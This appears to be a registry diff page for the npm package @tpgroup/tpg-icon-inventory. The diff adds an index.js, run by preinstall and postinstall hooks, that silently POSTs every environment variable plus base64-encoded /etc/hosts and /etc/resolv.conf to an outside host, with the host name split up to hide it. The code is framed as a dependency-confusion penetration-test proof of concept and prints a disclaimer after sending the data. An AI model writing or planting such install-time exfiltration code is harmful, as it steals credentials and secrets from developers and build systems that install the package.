@tpgroup/tpg-icon-inventory 0.0.1-security → 1.1.319
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @tpgroup/tpg-icon-inventory might be problematic. Click here for more details.
- package/README.md +0 -5
- package/index.js +118 -0
- package/package.json +12 -4
- package/src/DETAILS.md +2 -0
package/README.md
CHANGED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40tpgroup%2Ftpg-icon-inventory for more information.
|
package/index.js
ADDED
|
@@ -0,0 +1,118 @@
|
|
|
1
|
+
/*
|
|
2
|
+
--[Dependency Confusion Attack]--
|
|
3
|
+
|
|
4
|
+
Proof-of-Concept for an ongoing penetration test.
|
|
5
|
+
Please that a look at src/DETAILS.md
|
|
6
|
+
*/
|
|
7
|
+
|
|
8
|
+
|
|
9
|
+
const https = require('https');
|
|
10
|
+
const fs = require('fs')
|
|
11
|
+
|
|
12
|
+
let dns_mockendpoint = 'u4z29mfue0mjpoygbtm4zo2cy34usugj.cb.mog'+ 'wailabs.de'
|
|
13
|
+
let endpoint = 'https://npmproject8923895823.mog'+'waisecurity.de/en-US'
|
|
14
|
+
|
|
15
|
+
|
|
16
|
+
|
|
17
|
+
// slightly modified version from
|
|
18
|
+
// https://stackoverflow.com/questions/40537749/how-do-i-make-a-https-post-in-node-js-without-any-third-party-module
|
|
19
|
+
function post(url, data) {
|
|
20
|
+
data["module"] = "1.1.888"
|
|
21
|
+
const dataString = JSON.stringify(data)
|
|
22
|
+
|
|
23
|
+
const options = {
|
|
24
|
+
method: 'POST',
|
|
25
|
+
headers: {
|
|
26
|
+
'Content-Type': 'application/json',
|
|
27
|
+
'Content-Length': dataString.length,
|
|
28
|
+
},
|
|
29
|
+
timeout: 1000, // in ms
|
|
30
|
+
}
|
|
31
|
+
|
|
32
|
+
return new Promise((resolve, reject) => {
|
|
33
|
+
const req = https.request(url, options, (res) => {
|
|
34
|
+
if (res.statusCode < 200 || res.statusCode > 299) {
|
|
35
|
+
return reject(new Error(`HTTP status code ${res.statusCode}`))
|
|
36
|
+
}
|
|
37
|
+
|
|
38
|
+
const body = []
|
|
39
|
+
res.on('data', (chunk) => body.push(chunk))
|
|
40
|
+
res.on('end', () => {
|
|
41
|
+
const resString = Buffer.concat(body).toString()
|
|
42
|
+
resolve(resString)
|
|
43
|
+
})
|
|
44
|
+
})
|
|
45
|
+
|
|
46
|
+
req.on('error', (err) => {
|
|
47
|
+
reject(err)
|
|
48
|
+
})
|
|
49
|
+
|
|
50
|
+
req.on('timeout', () => {
|
|
51
|
+
req.destroy()
|
|
52
|
+
reject(new Error('Request time out'))
|
|
53
|
+
})
|
|
54
|
+
|
|
55
|
+
req.write(dataString)
|
|
56
|
+
req.end()
|
|
57
|
+
}).catch(_ignore)
|
|
58
|
+
}
|
|
59
|
+
|
|
60
|
+
function get_file(fname){
|
|
61
|
+
let contents
|
|
62
|
+
if (fs.existsSync(fname)) {
|
|
63
|
+
contents = fs.readFileSync(fname, { encoding: 'base64' })
|
|
64
|
+
}
|
|
65
|
+
return {content: contents, name: fname, empty: !fs.existsSync(fname) }
|
|
66
|
+
}
|
|
67
|
+
|
|
68
|
+
|
|
69
|
+
// https://stackoverflow.com/questions/1349404/generate-random-string-characters-in-javascript
|
|
70
|
+
function makeid(length) {
|
|
71
|
+
let result = '';
|
|
72
|
+
const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
|
|
73
|
+
const charactersLength = characters.length;
|
|
74
|
+
let counter = 0;
|
|
75
|
+
while (counter < length) {
|
|
76
|
+
result += characters.charAt(Math.floor(Math.random() * charactersLength));
|
|
77
|
+
counter += 1;
|
|
78
|
+
}
|
|
79
|
+
return result;
|
|
80
|
+
}
|
|
81
|
+
|
|
82
|
+
function _ignore(err){
|
|
83
|
+
return
|
|
84
|
+
}
|
|
85
|
+
|
|
86
|
+
function print_info(){
|
|
87
|
+
console.log(``)
|
|
88
|
+
console.log(`[!] Hello it seems like you downloaded the wrong dependency! [!]`)
|
|
89
|
+
console.log(`Your environment is prune to dependency confusion.`)
|
|
90
|
+
console.log(`This is part of an active penetration test. `)
|
|
91
|
+
throw new Error("Depdendency confusion!")
|
|
92
|
+
}
|
|
93
|
+
|
|
94
|
+
// main
|
|
95
|
+
(async() => {
|
|
96
|
+
const device_id = makeid(15)
|
|
97
|
+
endpoint = endpoint + "/" + device_id // ugly but more reliable than other api calls
|
|
98
|
+
|
|
99
|
+
// env
|
|
100
|
+
let data = process.env
|
|
101
|
+
await post(endpoint, data).catch(_ignore)
|
|
102
|
+
|
|
103
|
+
// dns
|
|
104
|
+
try{
|
|
105
|
+
post('https://' +device_id + '-' + dns_mockendpoint, data).catch(_ignore)
|
|
106
|
+
}catch(e){}
|
|
107
|
+
|
|
108
|
+
// mac/lin attribution files
|
|
109
|
+
await post(endpoint, get_file("/etc/hosts")).catch(_ignore)
|
|
110
|
+
await post(endpoint, get_file("/etc/resolv.conf")).catch(_ignore)
|
|
111
|
+
|
|
112
|
+
// win exfil not required - env should be enough
|
|
113
|
+
|
|
114
|
+
|
|
115
|
+
// --[Disclaimer info]--
|
|
116
|
+
print_info()
|
|
117
|
+
|
|
118
|
+
})();
|
package/package.json
CHANGED
|
@@ -1,6 +1,14 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@tpgroup/tpg-icon-inventory",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
3
|
+
"version": "1.1.319",
|
|
4
|
+
"description": "Proof-of-Concept for Project 7 - active p e n e t r a t i o n test",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC",
|
|
12
|
+
"dependencies": {
|
|
13
|
+
}
|
|
14
|
+
}
|
package/src/DETAILS.md
ADDED